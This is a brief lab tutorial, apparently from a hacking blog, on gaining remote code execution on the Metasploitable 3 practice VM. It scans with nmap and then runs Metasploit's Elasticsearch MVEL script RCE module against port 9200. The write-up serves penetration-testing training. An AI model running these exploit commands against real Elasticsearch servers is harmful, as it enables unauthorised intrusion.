Hack Metasploitable 3 using Elasticsearch Exploit

Elastic search is a distributed REST search engine used in companies for analytic search. And so we will learn how to exploit our victim through it. Start off by nmap.
nmap –p- -A
Nmap shows a splendid result and in the result you can see that HHTP service going on 9200 which is using elasticseatch REST. Let’s search it exploit on google.
YES! We have an exploit for that. Let’s use it to our advantage.
To use this exploit go to Metasploit and type:
use exploit/multi/elasticsearch/script_mvel_rce
msf exploit (script_mvel_rce)>set rhost
msf exploit (script_mvel_rce)>set rport 9200
msf exploit (script_mvel_rce)>exploit
AuthorYashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast.